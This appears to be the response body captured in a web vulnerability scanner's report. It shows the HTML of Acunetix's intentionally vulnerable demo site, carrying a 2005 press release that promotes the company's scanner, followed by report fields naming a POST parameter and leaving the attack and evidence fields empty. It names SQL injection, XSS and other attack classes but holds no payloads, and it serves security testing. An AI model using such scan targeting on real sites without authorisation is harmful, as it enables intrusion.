1lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
